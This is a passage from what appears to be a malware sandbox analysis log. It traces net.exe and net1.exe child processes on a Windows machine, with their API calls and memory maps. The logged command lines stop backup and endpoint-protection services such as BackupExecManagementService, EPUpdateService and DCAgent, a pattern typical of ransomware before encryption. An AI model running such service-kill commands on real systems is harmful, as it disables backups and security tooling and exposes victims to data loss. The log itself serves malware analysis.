_String2="BACKUPEXECMANAGEMENTSERVICE") returned 17 [0091.072] _wcsicmp (_String1="svr", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 17 [0091.072] _wcsicmp (_String1="srv", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 17 [0091.072] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 10 [0091.072] _wcsicmp (_String1="alerter", _String2="BACKUPEXECMANAGEMENTSERVICE") returned -1 [0091.072] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 12 [0091.072] NetServiceControl (in: servername=0x0, service="BACKUPEXECMANAGEMENTSERVICE", opcode=0x0, arg=0x0, bufptr=0x20f630 | out: bufptr=0x20f630) returned 0x889 [0091.073] wcscpy_s (in: _Destination=0xff9f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0091.073] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0091.073] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff9f5b50, nSize=0x800, Arguments=0xff9f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0091.074] GetFileType (hFile=0xb) returned 0x2 [0091.074] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20f4f8 | out: lpMode=0x20f4f8) returned 1 [0091.075] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x20f4f0, lpReserved=0x0 | out: lpBuffer=0xff9f5b50*, lpNumberOfCharsWritten=0x20f4f0*=0x1e) returned 1 [0091.075] GetFileType (hFile=0xb) returned 0x2 [0091.075] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20f4f8 | out: lpMode=0x20f4f8) returned 1 [0091.075] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20f4f0, lpReserved=0x0 | out: lpBuffer=0xff9d1efc*, lpNumberOfCharsWritten=0x20f4f0*=0x2) returned 1 [0091.075] _ultow (in: _Dest=0x889, _Radix=2159968 | out: _Dest=0x889) returned="2185" [0091.075] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff9f5b50, nSize=0x800, Arguments=0xff9f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0091.076] GetFileType (hFile=0xb) returned 0x2 [0091.076] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20f4f8 | out: lpMode=0x20f4f8) returned 1 [0091.076] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x20f4f0, lpReserved=0x0 | out: lpBuffer=0xff9f5b50*, lpNumberOfCharsWritten=0x20f4f0*=0x34) returned 1 [0091.076] GetFileType (hFile=0xb) returned 0x2 [0091.076] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20f4f8 | out: lpMode=0x20f4f8) returned 1 [0091.076] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20f4f0, lpReserved=0x0 | out: lpBuffer=0xff9d1efc*, lpNumberOfCharsWritten=0x20f4f0*=0x2) returned 1 [0091.077] NetApiBufferFree (Buffer=0x9c100) returned 0x0 [0091.077] NetApiBufferFree (Buffer=0x9c120) returned 0x0 [0091.077] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecManagementService /y" [0091.077] exit (_Code=2) Process: id = "109" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x666fd000" os_pid = "0x1258" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "102" os_parent_pid = "0x11d0" cmd_line = "C:\\Windows\\system32\\net1 stop bedbg /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5357 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5358 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5359 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5360 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 5361 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5362 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5363 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5364 start_va = 0xff9d0000 end_va = 0xffa02fff entry_point = 0xff9d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 5365 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5366 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5367 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 5368 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5369 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 5370 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5371 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5372 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5373 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5374 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5375 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 5376 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 5377 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5378 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5379 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5380 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5381 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5382 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5383 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5384 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5385 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5386 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5387 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5388 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5389 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5390 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5391 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5392 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5393 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5394 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5413 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 512 os_tid = 0x125c [0090.982] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f870 | out: lpSystemTimeAsFileTime=0x18f870*(dwLowDateTime=0xeb66d6f0, dwHighDateTime=0x1d48689)) [0090.982] GetCurrentProcessId () returned 0x1258 [0090.982] GetCurrentThreadId () returned 0x125c [0090.983] GetTickCount () returned 0x20952 [0090.983] QueryPerformanceCounter (in: lpPerformanceCount=0x18f878 | out: lpPerformanceCount=0x18f878*=1813790100000) returned 1 [0090.984] GetModuleHandleW (lpModuleName=0x0) returned 0xff9d0000 [0090.984] __set_app_type (_Type=0x1) [0090.984] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff9e9c9c) returned 0x0 [0090.984] __getmainargs (in: _Argc=0xff9f4780, _Argv=0xff9f4790, _Env=0xff9f4788, _DoWildCard=0, _StartInfo=0xff9f479c | out: _Argc=0xff9f4780, _Argv=0xff9f4790, _Env=0xff9f4788) returned 0 [0090.984] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0090.984] GetConsoleOutputCP () returned 0x1b5 [0090.984] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff9fcec0 | out: lpCPInfo=0xff9fcec0) returned 1 [0090.984] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0090.986] sprintf_s (in: _DstBuf=0x18f818, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0090.986] setlocale (category=0, locale=".437") returned="English_United States.437" [0090.987] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0090.987] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0090.987] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop bedbg /y" [0090.987] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f5b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0090.987] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0090.987] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18f808 | out: Buffer=0x18f808*=0x374d40) returned 0x0 [0090.987] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18f808 | out: Buffer=0x18f808*=0x37c0e0) returned 0x0 [0090.987] _fileno (_File=0x7fefdba2a80) returned 0 [0090.987] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0090.988] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0090.988] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0090.988] _wcsicmp (_String1="config", _String2="stop") returned -16 [0090.988] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0090.988] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0090.988] _wcsicmp (_String1="file", _String2="stop") returned -13 [0090.988] _wcsicmp (_String1="files", _String2="stop") returned -13 [0090.988] _wcsicmp (_String1="group", _String2="stop") returned -12 [0090.988] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0090.988] _wcsicmp (_String1="help", _String2="stop") returned -11 [0090.988] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0090.988] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0090.988] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0090.988] _wcsicmp (_String1="session", _String2="stop") returned -15 [0090.988] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0090.988] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0090.988] _wcsicmp (_String1="share", _String2="stop") returned -12 [0090.988] _wcsicmp (_String1="start", _String2="stop") returned -14 [0090.988] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0090.988] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0090.988] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0090.988] _wcsicmp (_String1="accounts", _String2="bedbg") returned -1 [0090.988] _wcsicmp (_String1="computer", _String2="bedbg") returned 1 [0090.988] _wcsicmp (_String1="config", _String2="bedbg") returned 1 [0090.988] _wcsicmp (_String1="continue", _String2="bedbg") returned 1 [0090.988] _wcsicmp (_String1="cont", _String2="bedbg") returned 1 [0090.988] _wcsicmp (_String1="file", _String2="bedbg") returned 4 [0090.988] _wcsicmp (_String1="files", _String2="bedbg") returned 4 [0090.988] _wcsicmp (_String1="group", _String2="bedbg") returned 5 [0090.988] _wcsicmp (_String1="groups", _String2="bedbg") returned 5 [0090.988] _wcsicmp (_String1="help", _String2="bedbg") returned 6 [0090.988] _wcsicmp (_String1="helpmsg", _String2="bedbg") returned 6 [0090.988] _wcsicmp (_String1="localgroup", _String2="bedbg") returned 10 [0090.988] _wcsicmp (_String1="pause", _String2="bedbg") returned 14 [0090.988] _wcsicmp (_String1="session", _String2="bedbg") returned 17 [0090.988] _wcsicmp (_String1="sessions", _String2="bedbg") returned 17 [0090.988] _wcsicmp (_String1="sess", _String2="bedbg") returned 17 [0090.988] _wcsicmp (_String1="share", _String2="bedbg") returned 17 [0090.988] _wcsicmp (_String1="start", _String2="bedbg") returned 17 [0090.988] _wcsicmp (_String1="stats", _String2="bedbg") returned 17 [0090.988] _wcsicmp (_String1="statistics", _String2="bedbg") returned 17 [0090.988] _wcsicmp (_String1="stop", _String2="bedbg") returned 17 [0090.988] _wcsicmp (_String1="time", _String2="bedbg") returned 18 [0090.989] _wcsicmp (_String1="user", _String2="bedbg") returned 19 [0090.989] _wcsicmp (_String1="users", _String2="bedbg") returned 19 [0090.989] _wcsicmp (_String1="msg", _String2="bedbg") returned 11 [0090.989] _wcsicmp (_String1="messenger", _String2="bedbg") returned 11 [0090.989] _wcsicmp (_String1="receiver", _String2="bedbg") returned 16 [0090.989] _wcsicmp (_String1="rcv", _String2="bedbg") returned 16 [0090.989] _wcsicmp (_String1="netpopup", _String2="bedbg") returned 12 [0090.989] _wcsicmp (_String1="redirector", _String2="bedbg") returned 16 [0090.989] _wcsicmp (_String1="redir", _String2="bedbg") returned 16 [0090.989] _wcsicmp (_String1="rdr", _String2="bedbg") returned 16 [0090.989] _wcsicmp (_String1="workstation", _String2="bedbg") returned 21 [0090.989] _wcsicmp (_String1="work", _String2="bedbg") returned 21 [0090.989] _wcsicmp (_String1="wksta", _String2="bedbg") returned 21 [0090.989] _wcsicmp (_String1="prdr", _String2="bedbg") returned 14 [0090.989] _wcsicmp (_String1="devrdr", _String2="bedbg") returned 2 [0090.989] _wcsicmp (_String1="lanmanworkstation", _String2="bedbg") returned 10 [0090.989] _wcsicmp (_String1="server", _String2="bedbg") returned 17 [0090.989] _wcsicmp (_String1="svr", _String2="bedbg") returned 17 [0090.989] _wcsicmp (_String1="srv", _String2="bedbg") returned 17 [0090.989] _wcsicmp (_String1="lanmanserver", _String2="bedbg") returned 10 [0090.989] _wcsicmp (_String1="alerter", _String2="bedbg") returned -1 [0090.989] _wcsicmp (_String1="netlogon", _String2="bedbg") returned 12 [0090.989] _wcsupr (in: _String="bedbg" | out: _String="BEDBG") returned="BEDBG" [0090.989] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x37c900 [0091.078] GetServiceKeyNameW (in: hSCManager=0x37c900, lpDisplayName="BEDBG", lpServiceName=0xff9f5750, lpcchBuffer=0x18f728 | out: lpServiceName="", lpcchBuffer=0x18f728) returned 0 [0091.079] _wcsicmp (_String1="msg", _String2="BEDBG") returned 11 [0091.079] _wcsicmp (_String1="messenger", _String2="BEDBG") returned 11 [0091.079] _wcsicmp (_String1="receiver", _String2="BEDBG") returned 16 [0091.079] _wcsicmp (_String1="rcv", _String2="BEDBG") returned 16 [0091.079] _wcsicmp (_String1="redirector", _String2="BEDBG") returned 16 [0091.079] _wcsicmp (_String1="redir", _String2="BEDBG") returned 16 [0091.079] _wcsicmp (_String1="rdr", _String2="BEDBG") returned 16 [0091.079] _wcsicmp (_String1="workstation", _String2="BEDBG") returned 21 [0091.079] _wcsicmp (_String1="work", _String2="BEDBG") returned 21 [0091.079] _wcsicmp (_String1="wksta", _String2="BEDBG") returned 21 [0091.079] _wcsicmp (_String1="prdr", _String2="BEDBG") returned 14 [0091.079] _wcsicmp (_String1="devrdr", _String2="BEDBG") returned 2 [0091.079] _wcsicmp (_String1="lanmanworkstation", _String2="BEDBG") returned 10 [0091.079] _wcsicmp (_String1="server", _String2="BEDBG") returned 17 [0091.079] _wcsicmp (_String1="svr", _String2="BEDBG") returned 17 [0091.079] _wcsicmp (_String1="srv", _String2="BEDBG") returned 17 [0091.079] _wcsicmp (_String1="lanmanserver", _String2="BEDBG") returned 10 [0091.079] _wcsicmp (_String1="alerter", _String2="BEDBG") returned -1 [0091.079] _wcsicmp (_String1="netlogon", _String2="BEDBG") returned 12 [0091.079] NetServiceControl (in: servername=0x0, service="BEDBG", opcode=0x0, arg=0x0, bufptr=0x18f730 | out: bufptr=0x18f730) returned 0x889 [0091.080] wcscpy_s (in: _Destination=0xff9f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0091.080] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0091.080] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff9f5b50, nSize=0x800, Arguments=0xff9f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0091.082] GetFileType (hFile=0xb) returned 0x2 [0091.082] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f5f8 | out: lpMode=0x18f5f8) returned 1 [0091.082] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18f5f0, lpReserved=0x0 | out: lpBuffer=0xff9f5b50*, lpNumberOfCharsWritten=0x18f5f0*=0x1e) returned 1 [0091.082] GetFileType (hFile=0xb) returned 0x2 [0091.082] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f5f8 | out: lpMode=0x18f5f8) returned 1 [0091.082] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f5f0, lpReserved=0x0 | out: lpBuffer=0xff9d1efc*, lpNumberOfCharsWritten=0x18f5f0*=0x2) returned 1 [0091.083] _ultow (in: _Dest=0x889, _Radix=1635936 | out: _Dest=0x889) returned="2185" [0091.083] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff9f5b50, nSize=0x800, Arguments=0xff9f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0091.083] GetFileType (hFile=0xb) returned 0x2 [0091.083] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f5f8 | out: lpMode=0x18f5f8) returned 1 [0091.083] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x18f5f0, lpReserved=0x0 | out: lpBuffer=0xff9f5b50*, lpNumberOfCharsWritten=0x18f5f0*=0x34) returned 1 [0091.084] GetFileType (hFile=0xb) returned 0x2 [0091.084] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f5f8 | out: lpMode=0x18f5f8) returned 1 [0091.084] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f5f0, lpReserved=0x0 | out: lpBuffer=0xff9d1efc*, lpNumberOfCharsWritten=0x18f5f0*=0x2) returned 1 [0091.084] NetApiBufferFree (Buffer=0x374d40) returned 0x0 [0091.084] NetApiBufferFree (Buffer=0x37c0e0) returned 0x0 [0091.084] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop bedbg /y" [0091.084] exit (_Code=2) Process: id = "110" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x65094000" os_pid = "0x126c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop EPUpdateService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5396 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5397 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5398 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5399 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 5400 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5401 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5402 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5403 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5404 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5405 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5406 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 5407 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5408 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 5409 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5410 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 513 os_tid = 0x1270 Process: id = "111" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6276f000" os_pid = "0x1278" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "103" os_parent_pid = "0x1200" cmd_line = "C:\\Windows\\system32\\net1 stop DCAgent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5414 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5415 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5416 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5417 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 5418 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5419 start_va = 0x7efe0000 end_va = 